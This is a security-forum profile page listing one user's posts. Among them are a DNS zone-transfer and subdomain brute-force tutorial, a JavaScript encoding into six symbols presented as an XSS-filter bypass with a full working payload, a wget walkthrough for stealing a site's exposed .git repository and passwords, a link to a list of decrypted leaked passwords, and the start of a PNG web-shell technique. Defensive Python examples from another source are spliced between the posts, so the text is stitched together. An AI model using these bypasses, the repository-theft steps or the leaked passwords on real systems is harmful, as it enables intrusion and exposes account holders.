alien

Everything posted by alien

  1. I still assume there were people who realized it was a 4S and not a 5, but they were cut out of the video.
  2. Whoever has an account on docs, note that all of defcon20 is up (18gb).
  3. Any BSOD generates a minidump. You can "debug" it and find out more information. Usually the minidumps are saved in C:/windows/minidump/ and you will need the debugging tools from Microsoft to open them. Search g00gle for more information. Good luck!
  4. Post the source you got them from, too. They are from the late HH.
  5. NetSleuth features:
     • A realtime overview of devices connected to a network.
     • No requirement for hardware or reconfiguration of networks.
     • "Silent portscanning" and undetectable network monitoring.
     • Offline analysis of pcap files to aid in intrusion response and network forensics.
     • Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.

     Silent PortScanning
     Many network devices broadcast various information across the network. Often this is for 'zero configuration' style services, for example Apple's Bonjour protocol. This information often contains information on the machine, and services running on that device – great information for fingerprinting. For this reason, it is possible to obtain port scanning style information completely silently. NetSleuth also does not put the network adapters into promiscuous mode, mitigating some techniques to detect sniffing network adapters.

     No Configuration
     NetSleuth is a 100% software solution, and will monitor traffic on switched or hubbed networks. Any Windows machine on the network can be used.

     Offline Analysis
     A network capture from any network with consumer devices will contain a huge amount of rich broadcast traffic for analysis. NetSleuth can analyse and extract this data from .pcap files from Snort, Wireshark or other tools. It can also analyse data intercepted by Kismet (the .pcapdump files).

     Protocols
     NetSleuth can extract, analyse and fingerprint devices from the following protocols:
     • Apple MDNS / Bonjour
     • SMB / CIFS / NetBios
     • DHCP (using the fingerbank.org resource)
     • SSDP (as used in Microsoft Zero Config)

     Download
     Windows version - Download NetSleuth | NetGrab Security
     Console version - NetSleuth Console | NetGrab Security

     Usage:
       python netsleuth.py -o <the name of a pcap file>
       python netsleuth.py -i <the name of a network adapter you want to sniff on – eg eth0>
  6. Many happy returns, Andrei!
  7. EARLY RELEASE DEF CON 20 VIDEO IS LIVE! We've got another treat for everybody. The good folks at Source of Knowledge slipped us a few of the presentation videos ahead of schedule, so here they are for your enjoyment. If you slept through the keynote, here's your chance to check it out. If you missed the whole show, here's a few solid reasons you should join us next year.
     • Keynote by General Keith Alexander - Shared Values, Shared Responsibility
     • FX and Greg - Hacking Routers: https://media.defcon.org/dc-20/video/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20-%20FX%20and%20Greg%20-%20Hacking%20[Redacted]%20Routers%20-%20Slides.m4v
     • Zack Fasel - Owned in 60 Seconds
     • Closing Ceremonies
     SLIDES: http://defcon.org/html/links/dc-archives/dc-20-archive.html
     Source: http://defcon.org/
     Post here if you find other videos from the defcon20 presentations.
  8. The SQL Injection Knowledge Base
  9. DNS is a naming system for computers that converts human readable domain names (e.g. infosecinstitute.com) into computer readable IP-addresses. However, some security vulnerabilities exist due to misconfigured DNS nameservers that can lead to information disclosure about the domain. This forms an important step of the Information Gathering stage during a Penetration test or Vulnerability assessment. In this article we will look at the following areas:
     • DNS Basics
     • Resource records and the Zone file
     • DNS Lookup and Reverse DNS Lookup
     • Understanding Wildcard Entries
     • DNS Zone transfer
     • DNS Bruteforcing
     Chapters 1 and 2 you can read in the link below to understand the basics of DNS.

     3) DNS Lookup and Reverse DNS Lookup
     DNS Lookup - Let's perform a DNS Lookup ourselves for infosecinstitute.com. We will do this by traversing the entire DNS hierarchy from the root servers to the top level domain. Open up the terminal in Backtrack (you can use your own favourite distro) and type in "dig". You will get something as shown in the figure below. What we get is a list of the Root DNS Servers. Let's use this root DNS server to query infosecinstitute.com. We do this as shown in the figure below. What we get is a list of authoritative name servers for the com domain. Notice the dot (.) at the end; this is what makes this a fully qualified domain name (FQDN). Let's use these name servers to query again. Now we get the list of authoritative name servers for infosecinstitute.com (which are ns1.pairnic.com and ns2.pairnic.com). Now we need to query these name servers to get the IP-address of infosecinstitute.com. And now in the Answer Section we can see that the IP-address for infosecinstitute.com is 216.92.251.5. SUCCESS!

     Reverse DNS Lookup - Performing a Reverse DNS Lookup converts an IP-address into its hostname. For this we need to write the IP-address in reverse order (e.g. 192.168.1.1 will be 1.1.168.192) and then append ".in-addr.arpa." to it. Next we need to make a query for a PTR Record using DIG. Let's make a DNS PTR query for 216.92.251.5; the command here would be "dig 5.251.92.216.in-addr.arpa PTR". As we can clearly see, this IP-address resolves to infosecinstitute.com. As simple as that!

     4) Understanding Wildcard Entries
     WildCard - A wildcard entry is used to provide responses for subdomains that do not exist. For example, let's say we have a domain example.com. If we set a wildcard record for *.example.com and give it the value example.com then the requests for all the non-existent subdomains of example.com (e.g. abcd.example.com, blah.example.com) will point to example.com. In the information gathering stage of a penetration test of a website, it is important to identify the subdomains and the IP-addresses corresponding to them. Introducing a Wildcard feature reduces this to a small extent.

     Bypassing Wildcard entries - In case wildcard entries are set on a particular domain, they could be bypassed to reveal information about its subdomains. This is done by brute forcing the subdomains. We have a wordlist which contains the subdomain names we want to test the domain against. Then we do a ping of all these subdomains; if these domains resolve to an IP-address different from the host IP-address, then we can very surely say that this subdomain actually exists. However, before performing a brute force it would be better to actually check if Wildcard entries are enabled or not. For that we can ping some random subdomains, e.g. 434234.example.com, and see if its IP-address is the same as the host IP-address (in this case example.com). If this is the case for some random subdomains, then we can clearly say that Wildcard entries are enabled for this domain. We will perform a demo of this in the coming section.

     5) DNS Zone Transfer - We saw in the previous exercises that every domain has some authoritative name servers associated with it. For example, in the case of google.com, the nameservers were ns1.google.com to ns4.google.com. These nameservers are used for handling requests related to the domain google.com. Let's say we have a domain example.com and it has its two nameservers as ns1.example.com and ns2.example.com. Usually a big organization will have more than one nameserver so that if one goes down for some time, the other one is ready to back it up and handle the requests. Usually one of these servers will be the Master server and the other one will be the slave server. Hence, to stay in sync with each other, the slave server must query the Master server and fetch the latest records after a specific period of time. The Master server will provide the slave server with all the information it has. This is basically what is called a "Zone Transfer". It's like asking the nameserver "Give me everything you have". A properly configured nameserver should only be allowed to serve requests of Zone transfer from other Nameservers of the same domain. However, if the server is not configured properly it will serve all requests of Zone transfer made to it without checking the querying client. This leads to leakage of valuable information. DNS Zone transfer is sometimes referred to through its opcode mnemonic AXFR. Let's see an example of a Zone transfer. We will be using the tool Fierce, present by default in Backtrack. Fierce is one of the best tools available out there for DNS Analysis. Type in the following command: "perl fierce.pl -dns searching-eye.com". We get something as shown in the figure below. What fierce does is that it first finds out the nameservers for the domain. It then checks to see if they allow zone transfers. Since one of the nameservers is not properly configured, it allows zone transfer and what we see is a dump of all the information (records, subdomains etc).

     Why is Zone transfer a Security Issue? A zone transfer reveals a lot of information about the domain. This forms a very important part of the "Information Gathering" stage during a penetration test, vulnerability assessment etc. We can figure out a lot of things by looking at the dump. For example, we can find different subdomains. Some of them might be running on different servers. Those servers may not be fully patched and hence be vulnerable. From this point, we can start thinking about Metasploit, Nessus, Nmap etc. and do a full vulnerability assessment of the domain. Hence this kind of information increases our attack vector by a fair amount, an amount which cannot be ignored. To protect your nameservers from leaking valuable information, one must allow zone transfer to other nameservers of the same domain only. For example, ns1.example.com should allow zone transfer to ns2.example.com only and discard all the other requests.

     6) DNS Bruteforcing - DNS Zone transfers may not work all the time. In fact, it will not work most of the time. Most of the DNS servers are properly configured and do not allow zone transfers to every client. Well, what do we do then? Simple answer: the same thing we do when nothing works, BRUTE FORCE it! Basically we have a wordlist containing a huge list of hosts. We first check for wildcard entries by checking if a random subdomain, e.g. 132qdssac.example.com, resolves to the same IP-address as example.com. If this is the case, we know Wildcard entries are set. We then query the domain by using each of the words in our wordlist. For example, if one of the entries in the wordlist file is "ads", then we make a query for ads.example.com. If it resolves to a different IP-address then we are sure that this subdomain actually exists. Hence we now have information about the name of the subdomain and its IP-address. If wildcard entries are not set, we do the same thing and see if we get a response from any subdomain we query. If we get a response back, we can be sure that the subdomain actually exists. In the end what we get is a bunch of information about the domain. Let's see this through a demo. We will again use the tool "Fierce". Fierce is a very handy tool for DNS Analysis and it is something everyone should have in their armory. Fierce will first check if Zone transfers are allowed or not; if zone transfers are allowed, it will dump all the information and exit happily, otherwise it will brute force it. We need to supply Fierce with a wordlist containing a list of all the possible subdomain names (e.g. hosts, ads, contracts). Fierce comes with an inbuilt wordlist file "hosts.txt" and we will be using the same for our demo. As we can see, Fierce dumps out information about the subdomains of google.com.

     CONCLUSION
     The DNS protocol is a very critical component of the Internet as it resolves IP-addresses into hostnames and makes life a lot easier for us. However, if the nameservers are not properly configured they might leak out the whole DNS server database to any malicious hacker. Even if the servers are properly configured, they can be brute forced to leak information about their mail servers, IP addresses, etc. It is therefore important to properly configure your DNS servers and be aware of the security issues with DNS.
     Credits: InfoSec Resources – DNS Hacking (Beginner to Advanced)
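The checks the article describes, as an added example (not from the article or from Fierce): building the in-addr.arpa name for a PTR lookup, the wildcard probe with random labels (generalised here so that the random names must resolve to one consistent address, where the article compares against the apex), and a hand-built AXFR query over TCP (AXFR is query type 252) for verifying that a nameserver you administer refuses transfers to arbitrary clients. Standard library only; the example.com names and addresses in the tests are constructed.

```python
import secrets
import socket
import struct

AXFR_QTYPE = 252  # RFC 1035 QTYPE value for a full zone transfer
IN_CLASS = 1


def ptr_name(ip: str) -> str:
    """Reverse-lookup name: octets reversed, then .in-addr.arpa. appended."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        raise ValueError("not an IPv4 address: %r" % ip)
    return ".".join(reversed(octets)) + ".in-addr.arpa."


def encode_name(name: str) -> bytes:
    """DNS wire format for a name: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_axfr_query(zone: str, txid: int) -> bytes:
    """AXFR query framed for TCP: a 2-byte length, then header and one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags 0: plain query
    question = encode_name(zone) + struct.pack("!HH", AXFR_QTYPE, IN_CLASS)
    message = header + question
    return struct.pack("!H", len(message)) + message


def parse_reply_header(message: bytes, txid: int) -> dict:
    """Return the RCODE and answer count of the first message of a reply."""
    if len(message) < 12:
        raise ValueError("truncated DNS header")
    rid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", message[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    return {"rcode": flags & 0x000F, "answers": an}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def zone_transfer_allowed(nameserver: str, zone: str, timeout: float = 5.0) -> bool:
    """Ask one nameserver for the whole zone and report whether it complied.
    A correctly restricted server answers RCODE 5 (REFUSED) or returns no records;
    run this against the nameservers you administer to confirm the restriction."""
    txid = secrets.randbelow(0x10000)
    with socket.create_connection((nameserver, 53), timeout=timeout) as sock:
        sock.sendall(build_axfr_query(zone, txid))
        length = struct.unpack("!H", _recv_exact(sock, 2))[0]
        reply = parse_reply_header(_recv_exact(sock, length), txid)
    return reply["rcode"] == 0 and reply["answers"] > 0


def wildcard_enabled(resolve, domain: str, probes: int = 3) -> bool:
    """Wildcard check: several random labels must all resolve, and to one
    consistent address. `resolve` maps a name to an address string or None,
    so it can be a real lookup or a fake table for offline testing."""
    seen = set()
    for _ in range(probes):
        answer = resolve("%s.%s" % (secrets.token_hex(6), domain))
        if answer is None:
            return False
        seen.add(answer)
    return len(seen) == 1
```

For a live wildcard check, pass a resolver such as a wrapper around socket.gethostbyname that returns None on socket.gaierror.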
  10. GJ for the program. I still prefer nmap, though: http://www.nmap.org/svn/scripts/http-enum.nse. A list of the most commonly used web subdirectories: http-fingerprints.lua
  11. Vodafone customers are exposed to phone tapping. THC reveals secrets of Vodafone's insecure Femto equipment. Crappy and braindead design of femto puts customers at risk. Problem can not be fixed by hardening femto. Redesign (e.g. removing mini RNC from the femto) is the only secure way forward. Vodafone urged to improve security. 3G/UMTS/WCDMA has such nice security features. Shame to see how one operator can fuck it up so badly... vodafone - THC Wiki. I don't think Orange or Cosmote are any different.
  12. Thanks Nytro. By the way, another list of "exploitable" virtual machines can be found here: boot2root.info (from g0tmi1k)
  13. Has anyone found the release notes?
  14. Transform any javascript code into an equivalent sequence of ()[]{}!+ characters. Try it here: Hieroglyphy | Patricio Palladino. Source code: https://github.com/alcuadrado/hieroglyphy

      Alphabet
      Many alphabets could do the job, but just for fun, I tried to keep it as small as possible, using only the following characters:
      • [ and ] to access array elements, objects properties, get numbers and cast elements to strings.
      • ( and ) to call functions and avoid parsing errors.
      • + to append strings, sum and cast elements to numbers.
      • ! to cast elements to booleans.
      • { and } to get NaN and the infamous string "[object Object]"

      Numbers
      To start our journey to the world of brackets, let's represent the numbers with our new alphabet. 0 is easily obtained by casting an empty array like this: +[]. In a similar way, we can cast the empty array to boolean to get true, and then to 1 with +!![]. Those numbers, along with +, would be enough to get every natural. But if we take advantage of JavaScript coercion of types, we can reduce the size of the sequence of the numbers in two ways. First, if we add a number and a boolean, both operands would be cast to numbers. So instead of using sums of ones to generate larger values, we can add just a 1 and a sequence of trues (we can use more than one true at a time because addition is left-to-right associative). For instance, here is 4: !+[]+!![]+!![]+!![]. The second idea is to get strings representing large numbers and cast them in order to get a shorter sequence of symbols. Once we obtained all the possible digits like we did above with 4, we can get the desired string by adding the first digit to [] (to make it a character), and combining all of them with + (with the necessary parens). Once again, the left-to-right associativity would save us lots of chars. Finally, we only need to cast that. Doing this, 12 would look like this: +((+!![]+[])+(!+[]+!![])).

      The second idea is to reuse what we've done above in order to get a shorter sequence of symbols. The main purpose of doing this is to represent bigger numbers without the need to sum 1 each time to get to our number, so instead we get its string representation and cast it to number. For example, representing 12 adding ones would be: (!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]), but by reusing 1 and 2 we can represent it like this: +((+!![]+[])+(!+[]+!![])). Here, we have cast the first digit to string, added the second, and then converted everything to a number. Speaking in terms of code, in the first case we did a simple sum: (1+1+1+1+1+1+1+1+1+1+1+1); and in the second one we concatenated two strings and cast them into a number like this: +("1"+2). Having said that, here is a table of all the possible digits:
        0  +[]
        1  +!![]
        2  !+[]+!![]
        3  !+[]+!![]+!![]
        4  !+[]+!![]+!![]+!![]
        5  !+[]+!![]+!![]+!![]+!![]
        6  !+[]+!![]+!![]+!![]+!![]+!![]
        7  !+[]+!![]+!![]+!![]+!![]+!![]+!![]
        8  !+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]
        9  !+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]

      Base elements and strings
      Now that we have numbers, let's go for more interesting elements from which we can obtain characters:
      • true, as we have already seen, can be obtained from !![]
      • false from ![]
      • undefined by accessing a non-existing element of an array: [][+[]]
      • NaN is the result of trying to cast an object to number: +{}
      • "[object Object]" with {}+[]
      Casting them to string (when necessary) and accessing those like arrays will give us single characters, from which we can even get more strings! These are " " (the space), "[", "]", "a", "b", "c", "d", "e", "f", "i", "j", "l", "n", "N", "o", "O", "r", "s", "t" and "u". By combining them with numbers we can get "1e100" and "1e1000", which when cast to numbers would result in 1e+100 and Infinity. And by casting them back to strings we can manage to get "y", "I" and "+".

      Gathering functions from available characters
      By combining those characters, we can only get these JavaScript functions and type names: "call", "concat", "constructor", "join", "slice" and "sort". Playing with our alphabet and these strings, we can get the following functions:
      • Function from array["sort"]["constructor"]
      • Array from array["constructor"]
      • Boolean from false["constructor"]
      • Number from 0["constructor"]
      • Object from {}["constructor"]
      • String from string["constructor"]
      • Function.prototype.call from f["call"]
      • String.prototype.concat from string["concat"]
      • Array.prototype.join from array["join"]
      • Array.prototype.slice from array["slice"]
      • Array.prototype.sort from array["sort"]
      Unluckily, none of these functions would give us new characters, but don't lose your hope yet!

      Exploiting the DOM for fun and characters
      If we sacrifice some portability and constrain the scripts to webpages, we can take for granted that DOM elements would be available, and get the remaining characters. One interesting function that becomes available is window.unescape, which would give us all the ASCII characters by calling window.unescape("%" + HEXA_ASCII_VAL). All we are missing to get unescape is the "p" character. So once again we make a trade-off, sacrificing some more portability to get it. If we know that we are in a webpage served over HTTP or HTTPS we can assume that by casting window.location to string, and getting its third character, we would obtain the precious "p". But how can we obtain the window.location object if we don't have access to window yet? Luckily JavaScript, being so permissive, would give us that object by doing this: Function("return location")(). And with location we now have three more characters, "h", "p", "/", and the escape and unescape functions! If we could get the character "%" we would be able to get the rest by calling unescape("%" + HEXA_ASCII_VALUE). Luckily, escaping "[" yields the string "%5B", and from that we can obtain the percentage sign.

      Now, we can reach any ASCII character like this:
      [][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+[]]+([][+[]]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+([]+[][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+[]+!![]+!![]]+({}+[])[+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][+[]]+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+([][+[]]+[])[+!![]])())[!+[]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]])()([][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+([]+[][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+[]+!![]+!![]]+({}+[])[+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][+[]]+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+([][+[]]+[])[+!![]])())[!+[]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]])()(({}+[])[+[]])[+[]]+HEXA_VALUE)

      Finally, all we need to transform a script into symbols is reading it as a string, encoding it in our alphabet, and using Function as eval.

      Hieroglyphy
      With the findings in this article, I've made a tool for encoding scripts, strings and numbers into this alphabet. It's available at github, so feel free to fork and modify it. You can also try it online here.

      Room for improvement
      Both this article and Hieroglyphy are just proofs of concept; there is plenty of room for improvement:
      • Once we were able to generate all ASCII characters, no effort was made to get the shortest representation of any of them.
      • When targeting modern browsers only or node.js, btoa would be a great help, yielding lots of characters in shorter sequences.
      • Depending on the target, one may select a bigger alphabet for reducing the encoding size.
      • If we know the domain where the script would be run, more characters can be grabbed from it.
      Credits: Bypassing XSS protection: Transform any javascript code into an equivalent sequence of ()[]{}!+ characters via reddit.com
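An added example (not from the article and not Hieroglyphy's code) that builds the digit and number encodings exactly as the Numbers section describes, and, on the defensive side, a heuristic for spotting such six-symbol payloads in request parameters, the kind of check a WAF rule or a log review would use. SAMPLE_QUERY is a constructed, URL-encoded query string.

```python
from urllib.parse import parse_qsl

ALPHABET = frozenset("()[]{}!+")

# Constructed sample: q carries the encoding of 12 percent-encoded as a browser would send it.
SAMPLE_QUERY = (
    "q=%2B%28%28%2B%21%21%5B%5D%2B%5B%5D%29%2B%28%21%2B%5B%5D%2B%21%21%5B%5D%29%29"
    "&page=2"
)


def encode_digit(d: int) -> str:
    """Digit encodings from the article: 0 is +[], 1 is +!![], and for d >= 2 one
    !+[] (true) followed by d-1 copies of +!![]; JavaScript adds the booleans
    left to right, coercing each to 1."""
    if d not in range(10):
        raise ValueError("single decimal digit expected")
    if d == 0:
        return "+[]"
    if d == 1:
        return "+!![]"
    return "!+[]" + "+!![]" * (d - 1)


def encode_number(n: int) -> str:
    """Multi-digit numbers the article's second way: cast the first digit to a
    string with +[], append the remaining digits (string + number concatenates
    in JavaScript), then cast the whole string back with a leading +."""
    if n < 0:
        raise ValueError("non-negative integer expected")
    digits = [int(c) for c in str(n)]
    if len(digits) == 1:
        return encode_digit(n)
    parts = ["(" + encode_digit(digits[0]) + "+[])"]
    parts += ["(" + encode_digit(d) + ")" for d in digits[1:]]
    return "+(" + "+".join(parts) + ")"


def symbol_ratio(s: str) -> float:
    """Share of characters that belong to the six-symbol alphabet."""
    if not s:
        return 0.0
    return sum(ch in ALPHABET for ch in s) / len(s)


def looks_symbol_encoded(s: str, min_len: int = 16, min_ratio: float = 0.95) -> bool:
    """Detection heuristic: legitimate parameter values are never long runs made
    almost entirely of these six characters, while every encoded script is."""
    return len(s) >= min_len and symbol_ratio(s) >= min_ratio


def flag_suspicious_params(query_string: str) -> list:
    """Return the (name, value) pairs of a query string that trip the heuristic.
    A bare + in a query string decodes to a space; an encoded payload arrives as
    %2B and parse_qsl restores it, which is the case handled here."""
    return [(k, v) for k, v in parse_qsl(query_string, keep_blank_values=True)
            if looks_symbol_encoded(v)]
```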
  15. Unlike other software that crashes with division by 0, I'd say it's very good.
  16. When you pentest a website and it's OK to "make a lot of noise" you can use the nmap script at http-enum.nse, that basically uses another script, http-fingerprints.lua, to find any common folders on a system; brute force, but it works. This most of the time returns folders like admin, tmp and others, but the one in particular we will discuss right now is the /.git folder.

      Now we need to get the /.git folder. Using git clone to download the sources will fail, so since directory listing is turned on we can download it using wget.
        $ mkdir git-test
        $ cd git-test
        $ wget --mirror --include-directories=/.git http://www.target.com/.git
      That'll take some time, depending on the size of the repository. When it's all done, go into the folder that wget created and use git reset:
        $ cd www.site.com
        $ git reset --hard
        HEAD is now at [...]
      Then look around - you have their entire codebase!
        $ ls
        db doc robots.txt scripts test
      Browse this for interesting scripts (like test scripts?), passwords, configuration details, deployment, addresses, and more! You just turned your blackbox pentest into a whitebox one, and maybe you got some passwords in the deal! You can also use "git log" to get commit messages, "git remote" to get a list of interesting servers, "git branch -a" to get a list of branches, etc.

      Why does this happen? When you clone a git repository, it creates a folder for git's metadata - .git - in the folder where you check it out. This is what lets you do a simple "git pull" to get new versions of your files, and can make deployment/upgrades a breeze.

      There are a few ways to prevent this:
      • Remove the .git folder after you check it out
      • Use a .htaccess file (or apache configuration file) to block access to .git
      • Keep the .git folder one level up - in a folder that's not available to the Web server
      • Use a framework - like Rails or .NET - where you don't give users access to the filesystem

      Finding this in an automated way
      You can quickly scan an entire network by using a command like:
        nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target>
      The output for an affected host will look something like:
        PORT   STATE SERVICE
        80/tcp open  http
        | http-git:
        |   Potential Git repository found at 206.220.193.152:80/.git/ (found 5 of 6 expected files)
        |   Repository description: Unnamed repository; edit this file 'description' to name the...
        |   Remote: https://github.com/skullspace/skullspace.ca.git
        |_  -> Source might be at https://github.com/skullspace/skullspace.ca
      Credits: SkullSecurity » Blog Archive » Using "Git Clone" to get Pwn3D
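An added example (not from the SkullSecurity post or from nmap's http-git script) for verifying that the mitigations listed above are in place on a site you administer: it probes /.git/HEAD, classifies the answer, and, if the directory is served, extracts the remote URLs from /.git/config the way the "Remote:" line in the nmap output does. Standard library only; the config text and HEAD contents in the tests are constructed.

```python
import re
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# A served .git/HEAD is either a symbolic ref or a detached 40-hex commit id.
HEAD_REF = re.compile(r"^ref: refs/heads/\S+\s*$")
HEAD_SHA = re.compile(r"^[0-9a-f]{40}\s*$")


def head_is_git(body: str) -> bool:
    """True when a response body is a plausible .git/HEAD rather than an error page."""
    return bool(HEAD_REF.match(body) or HEAD_SHA.match(body))


def remotes_from_config(body: str) -> dict:
    """Pull remote names and URLs out of a .git/config. Minimal INI walk:
    git indents keys with tabs and quotes the remote name in the section header."""
    remotes, current = {}, None
    for raw in body.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r'^\[remote\s+"([^"]+)"\]$', line)
        if m:
            current = m.group(1)
            continue
        if line.startswith("["):
            current = None
            continue
        if current and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                remotes[current] = value.strip()
    return remotes


def classify(status: int, head_body: str = "") -> str:
    """Turn one probe of /.git/HEAD into a finding for the site owner's report."""
    if status in (401, 403, 404):
        return "blocked"
    if status == 200 and head_is_git(head_body):
        return "exposed"
    return "unclear"


def fetch(url: str, timeout: float = 5.0):
    """GET a URL; return (status, first 4 KiB of body), with status 0 on connection failure."""
    req = Request(url, headers={"User-Agent": "git-exposure-audit"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""


def audit_site(base_url: str) -> dict:
    """Check whether a site you administer serves its .git directory and, if so,
    which remotes its config names."""
    base = base_url.rstrip("/")
    status, head = fetch(base + "/.git/HEAD")
    result = {"verdict": classify(status, head), "remotes": {}}
    if result["verdict"] == "exposed":
        cstatus, config = fetch(base + "/.git/config")
        if cstatus == 200:
            result["remotes"] = remotes_from_config(config)
    return result
```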
  17. Very interesting that Mono is about 10 times faster than Dalvik. Java is going downhill. I saw that they ported all of Android to C# with XobotOS. C# is getting more and more optimized lately.
  18. raspberry pi project
      I ordered one myself 5 minutes ago. I saw that Android can be put on it too.
  19. The BackTrack Development team will be releasing an R3 revision of our Penetration Testing distribution in 2 weeks. This release focuses on bugfixes and over 50 new tool additions – making it the most potent revision yet. We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags. The DVD contains a BT5 R3 Gnome, 32 bit edition – burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012. Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August. We hope you enjoy this fine release as much as we do! BackTrack 5 R3 Release - Aug 13th, 2012
  20. I recommend Google enterprise if you're not paranoid about Google stealing your data. It was around 5 USD a month, I think.
  21. I also prefer something darker; this black and green theme is nice. Anyway, keep up the good work, we're looking forward to the new theme.
  22. @drealecs: I didn't find mine in that list either. Later edit: a list of decrypted passwords here: http://www.mediafire.com/?bq8bd5iojp50zci
  23. If you carefully encode a web shell in an image you can bypass server-side filters and seemingly make shells materialize out of nowhere (and I'm not talking about encoding data in comments or metadata) – this post will show you how it's possible to write PHP shells into PNG IDAT chunks using only GD.

      Exploiting a server misconfiguration or Local File Inclusion can be tricky if you cannot write code to the file system. In the past, applications that allow image uploads have provided a limited way to upload code to the server via metadata or malformed images. Quite often, however, images are resized, rotated, stripped of their metadata or encoded into other file formats, effectively destroying the web shell payload.

      PNG file format basics
